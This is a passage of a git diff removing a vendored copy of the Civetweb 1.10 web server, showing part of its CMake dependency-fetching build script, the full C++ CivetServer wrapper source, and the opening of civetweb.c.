-    if (BUILD_SHARED_LIBS)
-      set(LUA_BUILD_COMMAND "${LUA_BUILD_COMMAND};MYCFLAGS=-fPIC")
-    endif()
-    ExternalProject_Add(lua
-      URL "http://www.lua.org/ftp/lua-${CIVETWEB_LUA_VERSION}.tar.gz"
-      URL_MD5 ${CIVETWEB_LUA_MD5_HASH}
-      PREFIX "${CIVETWEB_THIRD_PARTY_DIR}"
-      CONFIGURE_COMMAND ""
-      BUILD_COMMAND ${LUA_BUILD_COMMAND}
-      BUILD_IN_SOURCE 1
-      INSTALL_COMMAND make install "INSTALL_TOP=<INSTALL_DIR>"
-      LOG_DOWNLOAD ${THIRD_PARTY_LOGGING}
-      LOG_UPDATE ${THIRD_PARTY_LOGGING}
-      LOG_CONFIGURE ${THIRD_PARTY_LOGGING}
-      LOG_BUILD ${THIRD_PARTY_LOGGING}
-      LOG_TEST ${THIRD_PARTY_LOGGING}
-      LOG_INSTALL ${THIRD_PARTY_LOGGING})
-    ExternalProject_Get_Property(lua INSTALL_DIR)
-    set(LUA_INSTALL_DIR ${INSTALL_DIR})
-    unset(INSTALL_DIR)
-    link_directories("${LUA_INSTALL_DIR}/lib")
-    include_directories("${LUA_INSTALL_DIR}/include")
-    set(LUA_LIBRARIES "${LUA_INSTALL_DIR}/lib/liblua.a")
-    add_dependencies(c-library lua)
-  else()
-    find_package(Lua)
-  endif()
-
-  # Lua Filesystem Support
-  string(REPLACE "." "_" LUA_FILESYSTEM_VERSION_UNDERSCORE ${CIVETWEB_LUA_FILESYSTEM_VERSION})
-  ExternalProject_Add(luafilesystem
-    URL "https://github.com/keplerproject/luafilesystem/archive/v_${LUA_FILESYSTEM_VERSION_UNDERSCORE}.tar.gz"
-    URL_MD5 ${CIVETWEB_LUA_FILESYSTEM_MD5_HASH}
-    PREFIX "${CIVETWEB_THIRD_PARTY_DIR}"
-    PATCH_COMMAND ${CMAKE_COMMAND} -E copy
-      "${CMAKE_CURRENT_SOURCE_DIR}/cmake/luafilesystem/CMakeLists.txt" <SOURCE_DIR>/CMakeLists.txt
-    CMAKE_ARGS
-      "-DCMAKE_C_COMPILER=${CMAKE_C_COMPILER}"
-      "-DCMAKE_INSTALL_PREFIX=<INSTALL_DIR>"
-    LOG_DOWNLOAD ${THIRD_PARTY_LOGGING}
-    LOG_UPDATE ${THIRD_PARTY_LOGGING}
-    LOG_CONFIGURE ${THIRD_PARTY_LOGGING}
-    LOG_BUILD ${THIRD_PARTY_LOGGING}
-    LOG_TEST ${THIRD_PARTY_LOGGING}
-    LOG_INSTALL ${THIRD_PARTY_LOGGING})
-  ExternalProject_Get_Property(luafilesystem INSTALL_DIR)
-  set(LUA_FILESYSTEM_INSTALL_DIR ${INSTALL_DIR})
-  unset(INSTALL_DIR)
-  link_directories("${LUA_FILESYSTEM_INSTALL_DIR}/lib")
-  include_directories("${LUA_FILESYSTEM_INSTALL_DIR}/include")
-  set(LUA_LIBRARIES "${LUA_LIBRARIES};${LUA_FILESYSTEM_INSTALL_DIR}/lib/libluafilesystem.a")
-  add_dependencies(c-library luafilesystem)
-
-  # Lua SQLite Support
-  if (${CIVETWEB_LUA_SQLITE_VERSION} VERSION_EQUAL "0.9.3")
-    set(LUA_SQLITE_FILENAME lsqlite3_fsl09w.zip)
-  elseif (${CIVETWEB_LUA_SQLITE_VERSION} VERSION_EQUAL "0.9.2")
-    set(LUA_SQLITE_FILENAME lsqlite3_fsl09v.zip)
-  elseif (${CIVETWEB_LUA_SQLITE_VERSION} VERSION_EQUAL "0.9.1")
-    set(LUA_SQLITE_FILENAME lsqlite3_fsl09t.zip)
-  else()
-    message(FATAL_ERROR "The Lua SQLite archive filename is unknown for version ${CIVETWEB_LUA_SQLITE_VERSION}")
-  endif()
-  ExternalProject_Add(luasqlite
-    URL "http://lua.sqlite.org/index.cgi/zip/${LUA_SQLITE_FILENAME}"
-    URL_MD5 ${CIVETWEB_LUA_SQLITE_MD5_HASH}
-    PREFIX "${CIVETWEB_THIRD_PARTY_DIR}"
-    PATCH_COMMAND ${CMAKE_COMMAND} -E copy
-      "${CMAKE_CURRENT_SOURCE_DIR}/cmake/luasqlite/CMakeLists.txt" <SOURCE_DIR>/CMakeLists.txt
-    CMAKE_ARGS
-      "-DCMAKE_C_COMPILER=${CMAKE_C_COMPILER}"
-      "-DCMAKE_INSTALL_PREFIX=<INSTALL_DIR>"
-    LOG_DOWNLOAD ${THIRD_PARTY_LOGGING}
-    LOG_UPDATE ${THIRD_PARTY_LOGGING}
-    LOG_CONFIGURE ${THIRD_PARTY_LOGGING}
-    LOG_BUILD ${THIRD_PARTY_LOGGING}
-    LOG_TEST ${THIRD_PARTY_LOGGING}
-    LOG_INSTALL ${THIRD_PARTY_LOGGING})
-  ExternalProject_Get_Property(luasqlite INSTALL_DIR)
-  set(LUA_SQLITE_INSTALL_DIR ${INSTALL_DIR})
-  unset(INSTALL_DIR)
-  link_directories("${LUA_SQLITE_INSTALL_DIR}/lib")
-  set(LUA_LIBRARIES "${LUA_LIBRARIES};${LUA_SQLITE_INSTALL_DIR}/lib/libluasqlite.a")
-  add_dependencies(c-library luasqlite)
-
-  # Lua XML Support
-  if (${CIVETWEB_LUA_XML_VERSION} VERSION_EQUAL "1.8.0")
-    set(LUA_XML_FILENAME LuaXML_130610.zip)
-  elseif (${CIVETWEB_LUA_XML_VERSION} VERSION_EQUAL "1.7.4")
-    set(LUA_XML_FILENAME LuaXML_101012.zip)
-  else()
-    message(FATAL_ERROR "The Lua XML archive filename is unknown for version ${CIVETWEB_LUA_XML_VERSION}")
-  endif()
-  ExternalProject_Add(luaxml
-    URL "http://viremo.eludi.net/LuaXML/${LUA_XML_FILENAME}"
-    URL_MD5 ${CIVETWEB_LUA_XML_MD5_HASH}
-    PREFIX "${CIVETWEB_THIRD_PARTY_DIR}"
-    PATCH_COMMAND ${CMAKE_COMMAND} -E copy
-      "${CMAKE_CURRENT_SOURCE_DIR}/cmake/luaxml/CMakeLists.txt" <SOURCE_DIR>/CMakeLists.txt
-    CMAKE_ARGS
-      "-DCMAKE_C_COMPILER=${CMAKE_C_COMPILER}"
-      "-DCMAKE_INSTALL_PREFIX=<INSTALL_DIR>"
-    LOG_DOWNLOAD ${THIRD_PARTY_LOGGING}
-    LOG_UPDATE ${THIRD_PARTY_LOGGING}
-    LOG_CONFIGURE ${THIRD_PARTY_LOGGING}
-    LOG_BUILD ${THIRD_PARTY_LOGGING}
-    LOG_TEST ${THIRD_PARTY_LOGGING}
-    LOG_INSTALL ${THIRD_PARTY_LOGGING})
-  ExternalProject_Get_Property(luaxml INSTALL_DIR)
-  set(LUA_XML_INSTALL_DIR ${INSTALL_DIR})
-  unset(INSTALL_DIR)
-  link_directories("${LUA_XML_INSTALL_DIR}/lib")
-  set(LUA_LIBRARIES "${LUA_LIBRARIES};${LUA_XML_INSTALL_DIR}/lib/libluaxml.a")
-  add_dependencies(c-library luaxml)
-
-  # SQLite Support
-  string (REGEX MATCHALL "[0-9]+" SQLITE_VERSION_MATCHES ${CIVETWEB_SQLITE_VERSION})
-  list(GET SQLITE_VERSION_MATCHES 0 SQLITE_VERSION_MAJOR)
-  list(GET SQLITE_VERSION_MATCHES 1 SQLITE_VERSION_MINOR)
-  list(GET SQLITE_VERSION_MATCHES 2 SQLITE_VERSION_PATCH)
-  set(SQLITE_FILE_VERSION ${SQLITE_VERSION_MAJOR}0${SQLITE_VERSION_MINOR}0${SQLITE_VERSION_PATCH}00)
-  ExternalProject_Add(sqlite
-    URL "http://www.sqlite.org/2015/sqlite-amalgamation-${SQLITE_FILE_VERSION}.zip"
-    URL_MD5 ${CIVETWEB_SQLITE_MD5_HASH}
-    PREFIX "${CIVETWEB_THIRD_PARTY_DIR}"
-    PATCH_COMMAND ${CMAKE_COMMAND} -E copy
-      "${CMAKE_CURRENT_SOURCE_DIR}/cmake/sqlite/CMakeLists.txt" <SOURCE_DIR>/CMakeLists.txt
-    CMAKE_ARGS
-      "-DCMAKE_C_COMPILER=${CMAKE_C_COMPILER}"
-      "-DCMAKE_INSTALL_PREFIX=<INSTALL_DIR>"
-    LOG_DOWNLOAD ${THIRD_PARTY_LOGGING}
-    LOG_UPDATE ${THIRD_PARTY_LOGGING}
-    LOG_CONFIGURE ${THIRD_PARTY_LOGGING}
-    LOG_BUILD ${THIRD_PARTY_LOGGING}
-    LOG_TEST ${THIRD_PARTY_LOGGING}
-    LOG_INSTALL ${THIRD_PARTY_LOGGING})
-  ExternalProject_Get_Property(sqlite INSTALL_DIR)
-  set(SQLITE_INSTALL_DIR ${INSTALL_DIR})
-  unset(INSTALL_DIR)
-  link_directories("${SQLITE_INSTALL_DIR}/lib")
-  include_directories("${SQLITE_INSTALL_DIR}/include")
-  set(LUA_LIBRARIES "${LUA_LIBRARIES};${SQLITE_INSTALL_DIR}/lib/libsqlite.a")
-  add_dependencies(c-library sqlite)
-
-  # Link all the Lua libraries
-  target_link_libraries(c-library ${LUA_LIBRARIES})
-endif()
-
-# The web server executable
-add_executable(c-executable main.c)
-set_target_properties(c-executable PROPERTIES
-  OUTPUT_NAME "civetweb"
-)
-if (CIVETWEB_INSTALL_EXECUTABLE)
-  install(
-    TARGETS c-executable
-    ARCHIVE DESTINATION lib
-    LIBRARY DESTINATION lib
-    RUNTIME DESTINATION bin
-    COMPONENT server)
-endif()
-if (BUILD_SHARED_LIBS)
-  target_compile_definitions(c-executable PRIVATE CIVETWEB_DLL_IMPORTS)
-endif()
-target_include_directories(
-  c-executable PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-target_link_libraries(c-executable c-library)
-if (LIBRT_FOUND)
-  target_link_libraries(c-executable LIBRT::LIBRT)
-endif()
-
-if (CIVETWEB_ENABLE_LUA)
-  add_library(lua-library third_party/lfs.c third_party/lsqlite3.c third_party/LuaXML_lib.c third_party/sqlite3.c)
-  set_target_properties(lua-library PROPERTIES
-    OUTPUT_NAME "lua-library"
-    VERSION ${CIVETWEB_VERSION}
-    SOVERSION ${CIVETWEB_VERSION}
-  )
-  target_include_directories(
-    lua-library PUBLIC
-    ${PROJECT_SOURCE_DIR}/src/third_party/lua-5.2.4)
-  install(
-    TARGETS lua-library
-    ARCHIVE DESTINATION lib
-    LIBRARY DESTINATION lib
-    RUNTIME DESTINATION bin
-    COMPONENT lua-library)
-endif()
-
-# The C++ API library
-if (CIVETWEB_ENABLE_CXX)
-  add_library(civetweb-cpp CivetServer.cpp)
-  
-  set_property(TARGET civetweb-cpp PROPERTY POSITION_INDEPENDENT_CODE ON)
-  set_target_properties(civetweb-cpp PROPERTIES
-    OUTPUT_NAME "civetweb-cpp"
-    VERSION ${CIVETWEB_VERSION}
-    SOVERSION ${CIVETWEB_VERSION}
-  )
-  if (BUILD_SHARED_LIBS)
-if (APPLE)
-  target_compile_definitions(civetweb-cpp PRIVATE CIVETWEB_DLL_EXPORTS)
- endif()
- endif()
-  target_include_directories(
-    civetweb-cpp PUBLIC
-    ${PROJECT_SOURCE_DIR}/include)
-  install(
-    TARGETS civetweb-cpp
-    ARCHIVE DESTINATION lib
-    LIBRARY DESTINATION lib
-    RUNTIME DESTINATION bin
-    COMPONENT civetweb-cpp)
-  install(FILES
-    ${PROJECT_SOURCE_DIR}/include/CivetServer.h
-    DESTINATION include
-    COMPONENT civetweb-cpp)
-endif()
diff --git a/thirdparty/civetweb-1.10/src/CivetServer.cpp b/thirdparty/civetweb-1.10/src/CivetServer.cpp
deleted file mode 100644
index 186f18b..0000000
--- a/thirdparty/civetweb-1.10/src/CivetServer.cpp
+++ /dev/null
@@ -1,609 +0,0 @@
-/* Copyright (c) 2013-2017 the Civetweb developers
- * Copyright (c) 2013 No Face Press, LLC
- *
- * License http://opensource.org/licenses/mit-license.php MIT License
- */
-
-#include "CivetServer.h"
-
-#include <stdlib.h>
-#include <string.h>
-#include <assert.h>
-#include <stdexcept>
-
-#ifndef UNUSED_PARAMETER
-#define UNUSED_PARAMETER(x) (void)(x)
-#endif
-
-bool
-CivetHandler::handleGet(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetHandler::handlePost(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetHandler::handleHead(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetHandler::handlePut(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetHandler::handlePatch(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetHandler::handleDelete(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetHandler::handleOptions(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetWebSocketHandler::handleConnection(CivetServer *server,
-                                        const struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return true;
-}
-
-void
-CivetWebSocketHandler::handleReadyState(CivetServer *server,
-                                        struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return;
-}
-
-bool
-CivetWebSocketHandler::handleData(CivetServer *server,
-                                  struct mg_connection *conn,
-                                  int bits,
-                                  char *data,
-                                  size_t data_len)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	UNUSED_PARAMETER(bits);
-	UNUSED_PARAMETER(data);
-	UNUSED_PARAMETER(data_len);
-	return true;
-}
-
-void
-CivetWebSocketHandler::handleClose(CivetServer *server,
-                                   const struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return;
-}
-
-int
-CivetServer::requestHandler(struct mg_connection *conn, void *cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	assert(request_info != NULL);
-	CivetServer *me = (CivetServer *)(request_info->user_data);
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return 0;
-
-	mg_lock_context(me->context);
-	me->connections[conn] = CivetConnection();
-	mg_unlock_context(me->context);
-
-	CivetHandler *handler = (CivetHandler *)cbdata;
-
-	if (handler) {
-		if (strcmp(request_info->request_method, "GET") == 0) {
-			return handler->handleGet(me, conn) ? 1 : 0;
-		} else if (strcmp(request_info->request_method, "POST") == 0) {
-			return handler->handlePost(me, conn) ? 1 : 0;
-		} else if (strcmp(request_info->request_method, "HEAD") == 0) {
-			return handler->handleHead(me, conn) ? 1 : 0;
-		} else if (strcmp(request_info->request_method, "PUT") == 0) {
-			return handler->handlePut(me, conn) ? 1 : 0;
-		} else if (strcmp(request_info->request_method, "DELETE") == 0) {
-			return handler->handleDelete(me, conn) ? 1 : 0;
-		} else if (strcmp(request_info->request_method, "OPTIONS") == 0) {
-			return handler->handleOptions(me, conn) ? 1 : 0;
-		} else if (strcmp(request_info->request_method, "PATCH") == 0) {
-			return handler->handlePatch(me, conn) ? 1 : 0;
-		}
-	}
-
-	return 0; // No handler found
-}
-
-int
-CivetServer::authHandler(struct mg_connection *conn, void *cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	assert(request_info != NULL);
-	CivetServer *me = (CivetServer *)(request_info->user_data);
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return 0;
-
-	mg_lock_context(me->context);
-	me->connections[conn] = CivetConnection();
-	mg_unlock_context(me->context);
-
-	CivetAuthHandler *handler = (CivetAuthHandler *)cbdata;
-
-	if (handler) {
-		return handler->authorize(me, conn) ? 1 : 0;
-	}
-
-	return 0; // No handler found
-}
-
-int
-CivetServer::webSocketConnectionHandler(const struct mg_connection *conn,
-                                        void *cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	assert(request_info != NULL);
-	CivetServer *me = (CivetServer *)(request_info->user_data);
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return 0;
-
-	CivetWebSocketHandler *handler = (CivetWebSocketHandler *)cbdata;
-
-	if (handler) {
-		return handler->handleConnection(me, conn) ? 0 : 1;
-	}
-
-	return 1; // No handler found, close connection
-}
-
-void
-CivetServer::webSocketReadyHandler(struct mg_connection *conn, void *cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	assert(request_info != NULL);
-	CivetServer *me = (CivetServer *)(request_info->user_data);
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return;
-
-	CivetWebSocketHandler *handler = (CivetWebSocketHandler *)cbdata;
-
-	if (handler) {
-		handler->handleReadyState(me, conn);
-	}
-}
-
-int
-CivetServer::webSocketDataHandler(struct mg_connection *conn,
-                                  int bits,
-                                  char *data,
-                                  size_t data_len,
-                                  void *cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	assert(request_info != NULL);
-	CivetServer *me = (CivetServer *)(request_info->user_data);
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return 0;
-
-	CivetWebSocketHandler *handler = (CivetWebSocketHandler *)cbdata;
-
-	if (handler) {
-		return handler->handleData(me, conn, bits, data, data_len) ? 1 : 0;
-	}
-
-	return 1; // No handler found
-}
-
-void
-CivetServer::webSocketCloseHandler(const struct mg_connection *conn,
-                                   void *cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	assert(request_info != NULL);
-	CivetServer *me = (CivetServer *)(request_info->user_data);
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return;
-
-	CivetWebSocketHandler *handler = (CivetWebSocketHandler *)cbdata;
-
-	if (handler) {
-		handler->handleClose(me, conn);
-	}
-}
-
-CivetCallbacks::CivetCallbacks()
-{
-	memset(this, 0, sizeof(*this));
-}
-
-CivetServer::CivetServer(const char **options,
-                         const struct CivetCallbacks *_callbacks,
-                         const void *UserContextIn)
-    : context(0)
-{
-	struct CivetCallbacks callbacks;
-
-	UserContext = UserContextIn;
-
-	if (_callbacks) {
-		callbacks = *_callbacks;
-		userCloseHandler = _callbacks->connection_close;
-	} else {
-		userCloseHandler = NULL;
-	}
-	callbacks.connection_close = closeHandler;
-	context = mg_start(&callbacks, this, options);
-	if (context == NULL)
-		throw CivetException("null context when constructing CivetServer. "
-		                     "Possible problem binding to port.");
-}
-
-CivetServer::CivetServer(std::vector<std::string> options,
-                         const struct CivetCallbacks *_callbacks,
-                         const void *UserContextIn)
-    : context(0)
-{
-	struct CivetCallbacks callbacks;
-
-	UserContext = UserContextIn;
-
-	if (_callbacks) {
-		callbacks = *_callbacks;
-		userCloseHandler = _callbacks->connection_close;
-	} else {
-		userCloseHandler = NULL;
-	}
-	callbacks.connection_close = closeHandler;
-
-	std::vector<const char *> pointers(options.size());
-	for (size_t i = 0; i < options.size(); i++) {
-		pointers[i] = (options[i].c_str());
-	}
-	pointers.push_back(0);
-
-	context = mg_start(&callbacks, this, &pointers[0]);
-	if (context == NULL)
-		throw CivetException("null context when constructing CivetServer. "
-		                     "Possible problem binding to port.");
-}
-
-CivetServer::~CivetServer()
-{
-	close();
-}
-
-void
-CivetServer::closeHandler(const struct mg_connection *conn)
-{
-	CivetServer *me = (CivetServer *)mg_get_user_data(mg_get_context(conn));
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return;
-
-	if (me->userCloseHandler) {
-		me->userCloseHandler(conn);
-	}
-	mg_lock_context(me->context);
-	me->connections.erase(const_cast<struct mg_connection *>(conn));
-	mg_unlock_context(me->context);
-}
-
-void
-CivetServer::addHandler(const std::string &uri, CivetHandler *handler)
-{
-	mg_set_request_handler(context, uri.c_str(), requestHandler, handler);
-}
-
-void
-CivetServer::addWebSocketHandler(const std::string &uri,
-                                 CivetWebSocketHandler *handler)
-{
-	mg_set_websocket_handler(context,
-	                         uri.c_str(),
-	                         webSocketConnectionHandler,
-	                         webSocketReadyHandler,
-	                         webSocketDataHandler,
-	                         webSocketCloseHandler,
-	                         handler);
-}
-
-void
-CivetServer::addAuthHandler(const std::string &uri, CivetAuthHandler *handler)
-{
-	mg_set_auth_handler(context, uri.c_str(), authHandler, handler);
-}
-
-void
-CivetServer::removeHandler(const std::string &uri)
-{
-	mg_set_request_handler(context, uri.c_str(), NULL, NULL);
-}
-
-void
-CivetServer::removeWebSocketHandler(const std::string &uri)
-{
-	mg_set_websocket_handler(
-	    context, uri.c_str(), NULL, NULL, NULL, NULL, NULL);
-}
-
-void
-CivetServer::removeAuthHandler(const std::string &uri)
-{
-	mg_set_auth_handler(context, uri.c_str(), NULL, NULL);
-}
-
-void
-CivetServer::close()
-{
-	if (context) {
-		mg_stop(context);
-		context = 0;
-	}
-}
-
-int
-CivetServer::getCookie(struct mg_connection *conn,
-                       const std::string &cookieName,
-                       std::string &cookieValue)
-{
-	// Maximum cookie length as per microsoft is 4096.
-	// http://msdn.microsoft.com/en-us/library/ms178194.aspx
-	char _cookieValue[4096];
-	const char *cookie = mg_get_header(conn, "Cookie");
-	int lRead = mg_get_cookie(cookie,
-	                          cookieName.c_str(),
-	                          _cookieValue,
-	                          sizeof(_cookieValue));
-	cookieValue.clear();
-	cookieValue.append(_cookieValue);
-	return lRead;
-}
-
-const char *
-CivetServer::getHeader(struct mg_connection *conn,
-                       const std::string &headerName)
-{
-	return mg_get_header(conn, headerName.c_str());
-}
-
-void
-CivetServer::urlDecode(const char *src,
-                       std::string &dst,
-                       bool is_form_url_encoded)
-{
-	urlDecode(src, strlen(src), dst, is_form_url_encoded);
-}
-
-void
-CivetServer::urlDecode(const char *src,
-                       size_t src_len,
-                       std::string &dst,
-                       bool is_form_url_encoded)
-{
-	int i, j, a, b;
-#define HEXTOI(x) (isdigit(x) ? x - '0' : x - 'W')
-
-	dst.clear();
-	for (i = j = 0; i < (int)src_len; i++, j++) {
-		if (i < (int)src_len - 2 && src[i] == '%'
-		    && isxdigit(*(const unsigned char *)(src + i + 1))
-		    && isxdigit(*(const unsigned char *)(src + i + 2))) {
-			a = tolower(*(const unsigned char *)(src + i + 1));
-			b = tolower(*(const unsigned char *)(src + i + 2));
-			dst.push_back((char)((HEXTOI(a) << 4) | HEXTOI(b)));
-			i += 2;
-		} else if (is_form_url_encoded && src[i] == '+') {
-			dst.push_back(' ');
-		} else {
-			dst.push_back(src[i]);
-		}
-	}
-}
-
-bool
-CivetServer::getParam(struct mg_connection *conn,
-                      const char *name,
-                      std::string &dst,
-                      size_t occurrence)
-{
-	const char *formParams = NULL;
-	const struct mg_request_info *ri = mg_get_request_info(conn);
-	assert(ri != NULL);
-	CivetServer *me = (CivetServer *)(ri->user_data);
-	assert(me != NULL);
-	mg_lock_context(me->context);
-	CivetConnection &conobj = me->connections[conn];
-	mg_lock_connection(conn);
-	mg_unlock_context(me->context);
-
-	if (conobj.postData != NULL) {
-		formParams = conobj.postData;
-	} else {
-		const char *con_len_str = mg_get_header(conn, "Content-Length");
-		if (con_len_str) {
-			unsigned long con_len = atoi(con_len_str);
-			if (con_len > 0) {
-				// Add one extra character: in case the post-data is a text, it
-				// is required as 0-termination.
-				// Do not increment con_len, since the 0 terminating is not part
-				// of the content (text or binary).
-				conobj.postData = (char *)malloc(con_len + 1);
-				if (conobj.postData != NULL) {
-					// malloc may fail for huge requests
-					mg_read(conn, conobj.postData, con_len);
-					conobj.postData[con_len] = 0;
-					formParams = conobj.postData;
-					conobj.postDataLen = con_len;
-				}
-			}
-		}
-	}
-	if (formParams == NULL) {
-		// get requests do store html <form> field values in the http
-		// query_string
-		formParams = ri->query_string;
-	}
-	mg_unlock_connection(conn);
-
-	if (formParams != NULL) {
-		return getParam(formParams, strlen(formParams), name, dst, occurrence);
-	}
-
-	return false;
-}
-
-bool
-CivetServer::getParam(const char *data,
-                      size_t data_len,
-                      const char *name,
-                      std::string &dst,
-                      size_t occurrence)
-{
-	const char *p, *e, *s;
-	size_t name_len;
-
-	dst.clear();
-	if (data == NULL || name == NULL || data_len == 0) {
-		return false;
-	}
-	name_len = strlen(name);
-	e = data + data_len;
-
-	// data is "var1=val1&var2=val2...". Find variable first
-	for (p = data; p + name_len < e; p++) {
-		if ((p == data || p[-1] == '&') && p[name_len] == '='
-		    && !mg_strncasecmp(name, p, name_len) && 0 == occurrence--) {
-
-			// Point p to variable value
-			p += name_len + 1;
-
-			// Point s to the end of the value
-			s = (const char *)memchr(p, '&', (size_t)(e - p));
-			if (s == NULL) {
-				s = e;
-			}
-			assert(s >= p);
-
-			// Decode variable into destination buffer
-			urlDecode(p, (int)(s - p), dst, true);
-			return true;
-		}
-	}
-	return false;
-}
-
-void
-CivetServer::urlEncode(const char *src, std::string &dst, bool append)
-{
-	urlEncode(src, strlen(src), dst, append);
-}
-
-void
-CivetServer::urlEncode(const char *src,
-                       size_t src_len,
-                       std::string &dst,
-                       bool append)
-{
-	static const char *dont_escape = "._-$,;~()";
-	static const char *hex = "0123456789abcdef";
-
-	if (!append)
-		dst.clear();
-
-	for (; src_len > 0; src++, src_len--) {
-		if (isalnum(*(const unsigned char *)src)
-		    || strchr(dont_escape, *(const unsigned char *)src) != NULL) {
-			dst.push_back(*src);
-		} else {
-			dst.push_back('%');
-			dst.push_back(hex[(*(const unsigned char *)src) >> 4]);
-			dst.push_back(hex[(*(const unsigned char *)src) & 0xf]);
-		}
-	}
-}
-
-std::vector<int>
-CivetServer::getListeningPorts()
-{
-	std::vector<int> ports(50);
-	std::vector<struct mg_server_ports> server_ports(50);
-	int size = mg_get_server_ports(context,
-	                               (int)server_ports.size(),
-	                               &server_ports[0]);
-	if (size <= 0) {
-		ports.resize(0);
-		return ports;
-	}
-	ports.resize(size);
-	server_ports.resize(size);
-	for (int i = 0; i < size; i++) {
-		ports[i] = server_ports[i].port;
-	}
-
-	return ports;
-}
-
-CivetServer::CivetConnection::CivetConnection()
-{
-	postData = NULL;
-	postDataLen = 0;
-}
-
-CivetServer::CivetConnection::~CivetConnection()
-{
-	free(postData);
-}
diff --git a/thirdparty/civetweb-1.10/src/civetweb.c b/thirdparty/civetweb-1.10/src/civetweb.c
deleted file mode 100644
index 95945d3..0000000
--- a/thirdparty/civetweb-1.10/src/civetweb.c
+++ /dev/null
@@ -1,18067 +0,0 @@
-/* Copyright (c) 2013-2017 the Civetweb developers
- * Copyright (c) 2004-2013 Sergey Lyubka
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-#if defined(_WIN32)
-#if !defined(_CRT_SECURE_NO_WARNINGS)
-#define _CRT_SECURE_NO_WARNINGS /* Disable deprecation warning in VS2005 */
-#endif
-#ifndef _WIN32_WINNT /* defined for tdm-gcc so we can use getnameinfo */
-#define _WIN32_WINNT 0x0501
-#endif
-#else
-#if defined(__GNUC__) && !defined(_GNU_SOURCE)
-#define _GNU_SOURCE /* for setgroups() */
-#endif
-#if defined(__linux__) && !defined(_XOPEN_SOURCE)
-#define _XOPEN_SOURCE 600 /* For flockfile() on Linux */
-#endif
-#ifndef _LARGEFILE_SOURCE
-#define _LARGEFILE_SOURCE /* For fseeko(), ftello() */
-#endif
-#ifndef _FILE_OFFSET_BITS
-#define _FILE_OFFSET_BITS 64 /* Use 64-bit file offsets by default */
-#endif
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS /* <inttypes.h> wants this for C++ */
-#endif
-#ifndef __STDC_LIMIT_MACROS
-#define __STDC_LIMIT_MACROS /* C++ wants that for INT64_MAX */
-#endif
-#ifdef __sun
-#define __EXTENSIONS__  /* to expose flockfile and friends in stdio.h */
-#define __inline inline /* not recognized on older compiler versions */
-#endif
-#endif
-
-#if defined(USE_LUA)
-#define USE_TIMERS
-#endif
-
-#if defined(_MSC_VER)
-/* 'type cast' : conversion from 'int' to 'HANDLE' of greater size */
-#pragma warning(disable : 4306)
-/* conditional expression is constant: introduced by FD_SET(..) */
-#pragma warning(disable : 4127)
-/* non-constant aggregate initializer: issued due to missing C99 support */
-#pragma warning(disable : 4204)
-/* padding added after data member */
-#pragma warning(disable : 4820)
-/* not defined as a preprocessor macro, replacing with '0' for '#if/#elif' */
-#pragma warning(disable : 4668)
-/* no function prototype given: converting '()' to '(void)' */
-#pragma warning(disable : 4255)
